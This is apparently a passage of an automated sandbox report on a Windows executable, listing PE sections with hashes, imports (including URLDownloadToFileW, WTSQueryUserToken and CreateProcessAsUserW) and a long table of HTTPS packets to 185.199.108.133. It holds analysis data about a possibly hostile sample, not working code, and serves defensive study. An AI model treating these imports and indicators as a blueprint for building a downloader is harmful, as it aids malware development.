                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x60dd00x140.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x360000x390.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x343840x3440044e26ba7e96be6edb16cae0cabdf4ba5False0.517835115131579data6.457466429077762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x360000x31a5e0x31c00c5127ad2fae8ee2d35643d7b83dffa15False0.4164867305276382data6.268329302694746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x680000x2da80x1800d3983c22e13b30ca36bcc5ce8b390911False0.18603515625DOS executable (block device driver)3.2050803665603405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .pdata0x6b0000x2ea40x30008bc35622f15dac12037386bcfa847059False0.4722493489583333data5.465467733948664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .fptable0x6e0000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x6f0000x1e00x2009eb749b94f12b10c4656fbdd74aa9142False0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x700000x9d80xa000c5bf3474ebb54c7ebd5d121fe855905False0.526171875data5.382944096935259IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x6f0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                        Imports

                        DLLImport
                        WTSAPI32.dllWTSQueryUserToken
                        urlmon.dllURLDownloadToFileW
                        KERNEL32.dllGetSystemDirectoryW, CloseHandle, WTSGetActiveConsoleSessionId, WaitForSingleObject, GetModuleFileNameW, MultiByteToWideChar, GetCurrentDirectoryW, GetProcessHeap, HeapSize, WriteConsoleW, SetEndOfFile, CreateProcessW, CreateDirectoryW, CreateFileW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, GetFileInformationByHandle, SetFileInformationByHandle, AreFileApisANSI, GetLastError, DeviceIoControl, GetModuleHandleW, GetProcAddress, CopyFileW, GetFileInformationByHandleEx, CreateSymbolicLinkW, WideCharToMultiByte, LocalFree, FormatMessageA, GetLocaleInfoEx, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, RtlUnwind, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, VirtualProtect, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle
                        ADVAPI32.dllFreeSid, CheckTokenMembership, CreateProcessAsUserW, AllocateAndInitializeSid

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 21, 2024 09:39:51.666964054 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:51.667009115 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:51.667104959 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:51.678637981 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:51.678666115 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.141156912 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.141266108 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.207130909 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.207154036 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.208015919 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.208092928 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.209729910 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.256503105 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.422569036 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.422666073 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.422836065 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.422897100 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.422905922 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.422913074 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.422972918 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.422972918 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.422979116 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.422986031 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.423022985 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.423170090 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.423223019 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.423266888 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.423336983 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.423340082 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.423398018 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.423894882 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.424017906 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.424021006 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.424081087 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.427727938 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.427860022 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.428056002 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.428102970 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.511754990 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.511817932 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.511826038 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.511873960 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.511897087 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.511931896 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.511936903 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.511967897 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.512005091 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.512193918 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.512269020 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.512271881 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.512314081 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.512341976 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.512346983 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.512360096 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.512408018 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513135910 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513187885 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513194084 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513230085 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513232946 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513276100 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513341904 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513345957 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513396978 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513747931 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513811111 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513840914 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513844013 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513871908 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513880968 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513880968 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513887882 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.513906956 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.513969898 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.514558077 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.514602900 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.514606953 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.514650106 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.514652014 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.514703989 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.514708042 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.514823914 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.514832020 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.514949083 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.598628044 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.598640919 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.598664045 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.598710060 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.598731995 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.598778009 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.598778009 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.598784924 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.598830938 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.600363970 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.600393057 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.600466967 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.600466967 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.600476980 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.600531101 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.602272987 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.602297068 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.602353096 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.602364063 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.602391958 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.602415085 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.639415979 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.639455080 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.639497995 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.639509916 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.639576912 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.843822956 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.843849897 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.844495058 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.844506979 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.844566107 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.844669104 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.844688892 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.844731092 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.844742060 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.844763994 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.844880104 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.845045090 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845065117 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845122099 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845163107 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845165968 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.845165968 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.845180035 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845216990 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845232964 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845263004 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.845263004 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.845271111 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845313072 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.845313072 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.845684052 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845705032 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845760107 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.845767021 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.845779896 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.848747015 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.849416018 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.849663973 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.849945068 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.850033045 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.850048065 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.850059032 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.850096941 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.850168943 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.850217104 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.850326061 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.850476980 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.850508928 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.850516081 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.850558996 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.850558996 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.851556063 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.851577997 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.851663113 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.851663113 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.851670980 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.852147102 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.852175951 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.852216005 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.852227926 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.852268934 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.852268934 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.853456974 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.853480101 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.853631973 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.853640079 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.853893995 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.853909016 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.853921890 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.853970051 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.854379892 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.854406118 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.854413986 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.854440928 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.854500055 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.855020046 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.855037928 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.855101109 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.855110884 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.857135057 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.857170105 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.857240915 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.857240915 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.857250929 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.857673883 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.857988119 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.858015060 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.858102083 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.858102083 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.858108044 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.859091043 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.859746933 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.859767914 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.859910011 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.859918118 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.860233068 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.860255957 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.860271931 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.860282898 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.860322952 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.860322952 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.860399961 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.860418081 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.860519886 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.860519886 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.860526085 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.860580921 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.861274958 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.861500978 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.861823082 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.861891031 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.862416983 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.862437010 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.862498999 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.862498999 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.862504959 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.862549067 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.863207102 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.863225937 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.863300085 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.863300085 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.863306046 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.865667105 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.943300009 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.943326950 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.943398952 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.943409920 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.943464994 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.943464994 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.944304943 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.944324970 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.944371939 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.944386005 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.944430113 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.944430113 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.944735050 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.944755077 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.944904089 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.944910049 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945014954 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.945115089 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945132971 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945216894 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945250988 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.945256948 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945286989 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.945342064 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.945820093 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945841074 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945879936 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945898056 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.945911884 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.945961952 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.945961952 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.946007967 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.946089029 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.946239948 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.946310997 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:52.946332932 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:52.946393013 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.032042980 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.032074928 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.032223940 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.032238007 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.032407045 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.032432079 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.032529116 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.032529116 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.032536983 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.032880068 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.032898903 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.032941103 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.032953024 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.033018112 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.033018112 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.033077955 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.033101082 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.033143997 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.033155918 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.033211946 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.033211946 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.033472061 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.033490896 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.033544064 CEST63778443192.168.2.6185.199.108.133
                        Aug 21, 2024 09:39:53.033552885 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.034089088 CEST44363778185.199.108.133192.168.2.6
                        Aug 21, 2024 09:39:53.034113884 CEST44363778185.199.108.133192.168.2.6
